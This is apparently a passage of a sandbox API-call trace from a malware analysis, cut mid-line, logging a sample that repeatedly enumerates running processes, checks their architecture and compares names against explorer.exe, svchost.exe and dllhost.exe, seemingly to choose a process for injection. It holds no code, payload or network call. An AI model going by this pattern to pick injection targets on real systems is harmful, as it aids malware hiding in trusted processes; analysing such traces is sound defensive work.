Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.511] CloseHandle (hObject=0xec) returned 1 [0256.511] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0256.511] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0256.512] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.512] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.512] CloseHandle (hObject=0xec) returned 1 [0256.512] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.513] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.513] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0256.513] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.513] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0256.513] CloseHandle (hObject=0xec) returned 1 [0256.513] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0256.514] CloseHandle (hObject=0xe8) returned 1 [0256.514] Sleep (dwMilliseconds=0x3e8) [0257.518] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0257.519] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0257.520] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0257.520] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0257.521] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.521] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0257.521] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0257.522] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.522] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0257.522] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0257.523] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.523] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0257.523] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0257.524] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0257.524] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0257.524] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0257.525] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0257.525] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0257.526] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0257.526] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0257.527] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0257.527] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0257.528] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0257.528] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0257.529] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.529] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.529] CloseHandle (hObject=0xec) returned 1 [0257.529] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0257.529] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0257.530] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.530] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.530] CloseHandle (hObject=0xec) returned 1 [0257.530] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0257.530] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0257.531] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0257.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0257.531] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.531] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.531] CloseHandle (hObject=0xec) returned 1 [0257.531] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0257.532] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0257.532] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0257.532] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0257.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0257.532] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.532] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.532] CloseHandle (hObject=0xec) returned 1 [0257.532] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0257.532] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0257.532] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0257.532] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0257.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0257.533] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.533] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.533] CloseHandle (hObject=0xec) returned 1 [0257.533] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0257.533] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0257.533] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0257.533] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0257.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0257.533] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.533] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.534] CloseHandle (hObject=0xec) returned 1 [0257.534] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0257.534] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0257.534] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0257.534] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0257.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0257.534] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.534] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.534] CloseHandle (hObject=0xec) returned 1 [0257.534] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0257.534] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0257.534] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0257.534] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0257.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0257.535] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.535] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.535] CloseHandle (hObject=0xec) returned 1 [0257.535] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0257.535] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0257.535] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0257.535] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0257.535] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0257.535] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.535] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.536] CloseHandle (hObject=0xec) returned 1 [0257.536] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0257.536] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0257.536] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0257.536] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0257.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0257.536] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.536] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.536] CloseHandle (hObject=0xec) returned 1 [0257.536] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0257.536] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0257.536] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0257.536] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0257.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0257.537] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.537] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.537] CloseHandle (hObject=0xec) returned 1 [0257.537] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0257.537] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0257.537] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0257.537] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0257.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0257.538] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.538] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.538] CloseHandle (hObject=0xec) returned 1 [0257.538] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0257.538] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0257.538] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0257.538] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0257.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0257.538] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.538] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.538] CloseHandle (hObject=0xec) returned 1 [0257.538] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0257.538] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0257.538] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0257.538] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0257.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0257.539] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.539] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.539] CloseHandle (hObject=0xec) returned 1 [0257.539] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0257.539] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0257.539] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0257.539] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0257.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0257.540] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.540] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.540] CloseHandle (hObject=0xec) returned 1 [0257.540] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0257.540] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0257.540] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0257.540] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0257.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0257.540] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.540] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.540] CloseHandle (hObject=0xec) returned 1 [0257.540] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0257.540] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0257.540] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0257.540] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0257.541] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0257.541] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.541] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0257.541] CloseHandle (hObject=0xec) returned 1 [0257.541] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0257.541] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0257.541] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0257.541] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 